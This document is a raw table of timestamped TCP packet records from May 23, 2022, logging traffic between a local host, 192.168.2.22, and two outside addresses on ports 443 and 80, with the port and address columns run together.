                                                                                      May 23, 2022 08:59:57.311364889 CEST49173443192.168.2.22212.98.224.29
                                                                                      May 23, 2022 08:59:57.311384916 CEST44349173212.98.224.29192.168.2.22
                                                                                      May 23, 2022 08:59:57.311402082 CEST49173443192.168.2.22212.98.224.29
                                                                                      May 23, 2022 08:59:57.311455011 CEST49173443192.168.2.22212.98.224.29
                                                                                      May 23, 2022 08:59:57.311522961 CEST44349173212.98.224.29192.168.2.22
                                                                                      May 23, 2022 08:59:57.311603069 CEST49173443192.168.2.22212.98.224.29
                                                                                      May 23, 2022 08:59:57.311639071 CEST44349173212.98.224.29192.168.2.22
                                                                                      May 23, 2022 08:59:57.311713934 CEST49173443192.168.2.22212.98.224.29
                                                                                      May 23, 2022 08:59:57.311868906 CEST44349173212.98.224.29192.168.2.22
                                                                                      May 23, 2022 08:59:57.311954975 CEST49173443192.168.2.22212.98.224.29
                                                                                      May 23, 2022 08:59:57.311981916 CEST49173443192.168.2.22212.98.224.29
                                                                                      May 23, 2022 08:59:57.311991930 CEST44349173212.98.224.29192.168.2.22
                                                                                      May 23, 2022 08:59:57.312016010 CEST44349173212.98.224.29192.168.2.22
                                                                                      May 23, 2022 08:59:57.312078953 CEST49173443192.168.2.22212.98.224.29
                                                                                      May 23, 2022 08:59:57.312875032 CEST49173443192.168.2.22212.98.224.29
                                                                                      May 23, 2022 08:59:57.394484997 CEST44349173212.98.224.29192.168.2.22
                                                                                      May 23, 2022 08:59:57.394660950 CEST44349173212.98.224.29192.168.2.22
                                                                                      May 23, 2022 08:59:57.394660950 CEST49173443192.168.2.22212.98.224.29
                                                                                      May 23, 2022 08:59:57.394695044 CEST44349173212.98.224.29192.168.2.22
                                                                                      May 23, 2022 08:59:57.394747972 CEST49173443192.168.2.22212.98.224.29
                                                                                      May 23, 2022 08:59:57.394783974 CEST49173443192.168.2.22212.98.224.29
                                                                                      May 23, 2022 08:59:57.394953012 CEST44349173212.98.224.29192.168.2.22
                                                                                      May 23, 2022 08:59:57.395080090 CEST44349173212.98.224.29192.168.2.22
                                                                                      May 23, 2022 08:59:57.395104885 CEST49173443192.168.2.22212.98.224.29
                                                                                      May 23, 2022 08:59:57.395112038 CEST49173443192.168.2.22212.98.224.29
                                                                                      May 23, 2022 08:59:57.395121098 CEST44349173212.98.224.29192.168.2.22
                                                                                      May 23, 2022 08:59:57.395158052 CEST49173443192.168.2.22212.98.224.29
                                                                                      May 23, 2022 08:59:57.395163059 CEST49173443192.168.2.22212.98.224.29
                                                                                      May 23, 2022 08:59:57.395644903 CEST44349173212.98.224.29192.168.2.22
                                                                                      May 23, 2022 08:59:57.395653009 CEST49173443192.168.2.22212.98.224.29
                                                                                      May 23, 2022 08:59:57.395719051 CEST49173443192.168.2.22212.98.224.29
                                                                                      May 23, 2022 08:59:57.395756006 CEST44349173212.98.224.29192.168.2.22
                                                                                      May 23, 2022 08:59:57.395821095 CEST49173443192.168.2.22212.98.224.29
                                                                                      May 23, 2022 08:59:57.395975113 CEST44349173212.98.224.29192.168.2.22
                                                                                      May 23, 2022 08:59:57.396045923 CEST49173443192.168.2.22212.98.224.29
                                                                                      May 23, 2022 08:59:57.396085024 CEST44349173212.98.224.29192.168.2.22
                                                                                      May 23, 2022 08:59:57.396151066 CEST49173443192.168.2.22212.98.224.29
                                                                                      May 23, 2022 08:59:57.396294117 CEST44349173212.98.224.29192.168.2.22
                                                                                      May 23, 2022 08:59:57.396361113 CEST49173443192.168.2.22212.98.224.29
                                                                                      May 23, 2022 08:59:57.396398067 CEST44349173212.98.224.29192.168.2.22
                                                                                      May 23, 2022 08:59:57.396461964 CEST49173443192.168.2.22212.98.224.29
                                                                                      May 23, 2022 08:59:57.396639109 CEST44349173212.98.224.29192.168.2.22
                                                                                      May 23, 2022 08:59:57.396724939 CEST49173443192.168.2.22212.98.224.29
                                                                                      May 23, 2022 08:59:57.396745920 CEST44349173212.98.224.29192.168.2.22
                                                                                      May 23, 2022 08:59:57.396823883 CEST49173443192.168.2.22212.98.224.29
                                                                                      May 23, 2022 08:59:57.396927118 CEST44349173212.98.224.29192.168.2.22
                                                                                      May 23, 2022 08:59:57.396954060 CEST49173443192.168.2.22212.98.224.29
                                                                                      May 23, 2022 08:59:57.396980047 CEST49173443192.168.2.22212.98.224.29
                                                                                      May 23, 2022 08:59:57.397003889 CEST49173443192.168.2.22212.98.224.29
                                                                                      May 23, 2022 08:59:57.397032976 CEST44349173212.98.224.29192.168.2.22
                                                                                      May 23, 2022 08:59:57.397105932 CEST49173443192.168.2.22212.98.224.29
                                                                                      May 23, 2022 08:59:57.398684025 CEST49173443192.168.2.22212.98.224.29
                                                                                      May 23, 2022 08:59:57.479593039 CEST44349173212.98.224.29192.168.2.22
                                                                                      May 23, 2022 08:59:57.479756117 CEST49173443192.168.2.22212.98.224.29
                                                                                      May 23, 2022 08:59:57.479769945 CEST44349173212.98.224.29192.168.2.22
                                                                                      May 23, 2022 08:59:57.479795933 CEST44349173212.98.224.29192.168.2.22
                                                                                      May 23, 2022 08:59:57.479862928 CEST49173443192.168.2.22212.98.224.29
                                                                                      May 23, 2022 08:59:57.479872942 CEST49173443192.168.2.22212.98.224.29
                                                                                      May 23, 2022 08:59:57.480189085 CEST44349173212.98.224.29192.168.2.22
                                                                                      May 23, 2022 08:59:57.480268955 CEST49173443192.168.2.22212.98.224.29
                                                                                      May 23, 2022 08:59:57.480310917 CEST44349173212.98.224.29192.168.2.22
                                                                                      May 23, 2022 08:59:57.480393887 CEST49173443192.168.2.22212.98.224.29
                                                                                      May 23, 2022 08:59:57.480771065 CEST44349173212.98.224.29192.168.2.22
                                                                                      May 23, 2022 08:59:57.480889082 CEST49173443192.168.2.22212.98.224.29
                                                                                      May 23, 2022 08:59:57.480897903 CEST44349173212.98.224.29192.168.2.22
                                                                                      May 23, 2022 08:59:57.480922937 CEST44349173212.98.224.29192.168.2.22
                                                                                      May 23, 2022 08:59:57.480972052 CEST49173443192.168.2.22212.98.224.29
                                                                                      May 23, 2022 08:59:57.481211901 CEST44349173212.98.224.29192.168.2.22
                                                                                      May 23, 2022 08:59:57.481302977 CEST49173443192.168.2.22212.98.224.29
                                                                                      May 23, 2022 08:59:57.481329918 CEST44349173212.98.224.29192.168.2.22
                                                                                      May 23, 2022 08:59:57.481395006 CEST49173443192.168.2.22212.98.224.29
                                                                                      May 23, 2022 08:59:57.481544971 CEST44349173212.98.224.29192.168.2.22
                                                                                      May 23, 2022 08:59:57.481615067 CEST49173443192.168.2.22212.98.224.29
                                                                                      May 23, 2022 08:59:57.481662989 CEST44349173212.98.224.29192.168.2.22
                                                                                      May 23, 2022 08:59:57.481695890 CEST49173443192.168.2.22212.98.224.29
                                                                                      May 23, 2022 08:59:57.481731892 CEST49173443192.168.2.22212.98.224.29
                                                                                      May 23, 2022 08:59:57.481873989 CEST44349173212.98.224.29192.168.2.22
                                                                                      May 23, 2022 08:59:57.481961966 CEST49173443192.168.2.22212.98.224.29
                                                                                      May 23, 2022 08:59:57.482007980 CEST44349173212.98.224.29192.168.2.22
                                                                                      May 23, 2022 08:59:57.482083082 CEST49173443192.168.2.22212.98.224.29
                                                                                      May 23, 2022 08:59:57.482218981 CEST44349173212.98.224.29192.168.2.22
                                                                                      May 23, 2022 08:59:57.482295990 CEST49173443192.168.2.22212.98.224.29
                                                                                      May 23, 2022 08:59:57.482342005 CEST44349173212.98.224.29192.168.2.22
                                                                                      May 23, 2022 08:59:57.482414007 CEST49173443192.168.2.22212.98.224.29
                                                                                      May 23, 2022 08:59:57.482589006 CEST44349173212.98.224.29192.168.2.22
                                                                                      May 23, 2022 08:59:57.482672930 CEST49173443192.168.2.22212.98.224.29
                                                                                      May 23, 2022 08:59:57.482716084 CEST44349173212.98.224.29192.168.2.22
                                                                                      May 23, 2022 08:59:57.482805967 CEST49173443192.168.2.22212.98.224.29
                                                                                      May 23, 2022 08:59:57.484069109 CEST49173443192.168.2.22212.98.224.29
                                                                                      May 23, 2022 08:59:57.819547892 CEST44349173212.98.224.29192.168.2.22
                                                                                      May 23, 2022 08:59:57.819581032 CEST44349173212.98.224.29192.168.2.22
                                                                                      May 23, 2022 08:59:57.819705009 CEST44349173212.98.224.29192.168.2.22
                                                                                      May 23, 2022 08:59:57.819715977 CEST49173443192.168.2.22212.98.224.29
                                                                                      May 23, 2022 08:59:57.819741011 CEST44349173212.98.224.29192.168.2.22
                                                                                      May 23, 2022 08:59:57.819778919 CEST49173443192.168.2.22212.98.224.29
                                                                                      May 23, 2022 08:59:57.819801092 CEST49173443192.168.2.22212.98.224.29
                                                                                      May 23, 2022 08:59:57.819961071 CEST49173443192.168.2.22212.98.224.29
                                                                                      May 23, 2022 08:59:58.067328930 CEST44349173212.98.224.29192.168.2.22
                                                                                      May 23, 2022 08:59:58.067352057 CEST44349173212.98.224.29192.168.2.22
                                                                                      May 23, 2022 08:59:58.067424059 CEST44349173212.98.224.29192.168.2.22
                                                                                      May 23, 2022 08:59:58.067483902 CEST49173443192.168.2.22212.98.224.29
                                                                                      May 23, 2022 08:59:58.067507029 CEST44349173212.98.224.29192.168.2.22
                                                                                      May 23, 2022 08:59:58.067537069 CEST44349173212.98.224.29192.168.2.22
                                                                                      May 23, 2022 08:59:58.067565918 CEST49173443192.168.2.22212.98.224.29
                                                                                      May 23, 2022 08:59:58.067581892 CEST49173443192.168.2.22212.98.224.29
                                                                                      May 23, 2022 08:59:58.067591906 CEST44349173212.98.224.29192.168.2.22
                                                                                      May 23, 2022 08:59:58.067606926 CEST49173443192.168.2.22212.98.224.29
                                                                                      May 23, 2022 08:59:58.067614079 CEST49173443192.168.2.22212.98.224.29
                                                                                      May 23, 2022 08:59:58.067629099 CEST49173443192.168.2.22212.98.224.29
                                                                                      May 23, 2022 08:59:58.067634106 CEST44349173212.98.224.29192.168.2.22
                                                                                      May 23, 2022 08:59:58.067679882 CEST49173443192.168.2.22212.98.224.29
                                                                                      May 23, 2022 08:59:58.067795992 CEST49173443192.168.2.22212.98.224.29
                                                                                      May 23, 2022 08:59:58.068975925 CEST49173443192.168.2.22212.98.224.29
                                                                                      May 23, 2022 08:59:58.068995953 CEST44349173212.98.224.29192.168.2.22
                                                                                      May 23, 2022 09:00:00.383903980 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:00.498775959 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:00.498954058 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:00.499557018 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:00.614132881 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:00.677292109 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:00.677325010 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:00.677349091 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:00.677361965 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:00.677372932 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:00.677385092 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:00.677392960 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:00.677397966 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:00.677418947 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:00.677419901 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:00.677437067 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:00.677443981 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:00.677458048 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:00.677468061 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:00.677475929 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:00.677491903 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:00.677506924 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:00.677517891 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:00.677524090 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:00.677553892 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:00.680294991 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:00.792331934 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:00.792390108 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:00.792414904 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:00.792432070 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:00.792460918 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:00.792505980 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:00.792509079 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:00.792527914 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:00.792543888 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:00.792552948 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:00.792557955 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:00.792561054 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:00.792562008 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:00.792568922 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:00.792582989 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:00.792586088 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:00.792604923 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:00.792613029 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:00.792619944 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:00.792634010 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:00.792653084 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:00.792659044 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:00.792673111 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:00.792674065 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:00.792685986 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:00.792704105 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:00.792720079 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:00.792762041 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:00.792779922 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:00.792798996 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:00.792804956 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:00.792820930 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:00.792823076 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:00.792840958 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:00.792844057 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:00.792865038 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:00.792880058 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:00.793546915 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:00.907778978 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:00.907840967 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:00.907881975 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:00.907912970 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:00.907923937 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:00.907970905 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:00.907980919 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:00.907989979 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:00.908461094 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:00.908566952 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:00.908575058 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:00.908633947 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:00.908699989 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:00.908796072 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:00.908833027 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:00.908854008 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:00.908925056 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:00.908996105 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:00.909053087 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:00.909060955 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:00.909068108 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:00.909126997 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:00.909183025 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:00.909188986 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:00.909214020 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:00.909285069 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:00.909327984 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:00.909334898 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:00.909343004 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:00.909368038 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:00.909410954 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:00.909416914 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:00.909423113 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:00.909451962 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:00.909486055 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:00.909493923 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:00.909506083 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:00.909538031 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:00.909576893 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:00.909578085 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:00.909584045 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:00.909620047 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:00.909693956 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:00.909703970 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:00.909712076 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:00.909735918 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:00.909776926 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:00.909785986 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:00.909792900 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:00.909818888 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:00.909858942 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:00.909877062 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:00.909883976 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:00.909898996 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:00.909902096 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:00.909914970 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:00.909940958 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:00.909982920 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:00.909991026 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:00.909996986 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:00.910022020 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:00.910062075 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:00.910074949 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:00.910082102 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:00.910104036 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:00.910144091 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:00.910155058 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:00.910161972 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:00.910187006 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:00.910231113 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:00.910238981 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:00.910245895 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:00.910269976 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:00.910307884 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:00.910314083 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:00.910315037 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:00.910320044 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:00.910355091 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:00.910396099 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:00.910403967 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:00.910409927 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:00.910721064 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:00.910731077 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.023885012 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.023957968 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.024004936 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.024058104 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.024092913 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.024127960 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.024141073 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.024163008 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.024168015 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.024172068 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.024174929 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.024199009 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.024220943 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.025028944 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.025809050 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.025996923 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.026066065 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.026072025 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.026088953 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.026102066 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.026135921 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.026164055 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.026170969 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.026186943 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.026190042 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.026218891 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.026237011 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.026274920 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.026310921 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.026319027 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.026323080 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.026343107 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.026391983 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.026396990 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.026592970 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.026627064 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.026704073 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.026765108 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.026824951 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.026875019 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.026885986 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.026890039 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.026942015 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.026946068 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.026957035 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.027019024 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.027055025 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.027070999 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.027076960 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.027153969 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.027188063 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.027209044 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.027214050 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.027225018 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.027266979 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.027287960 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.027291059 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.027301073 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.027335882 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.027363062 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.027369022 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.027396917 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.027434111 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.027453899 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.027457952 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.027493000 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.027555943 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.027589083 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.027590990 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.027595043 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.027606964 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.027623892 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.027656078 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.027661085 CEST4917480192.168.2.2266.84.31.11
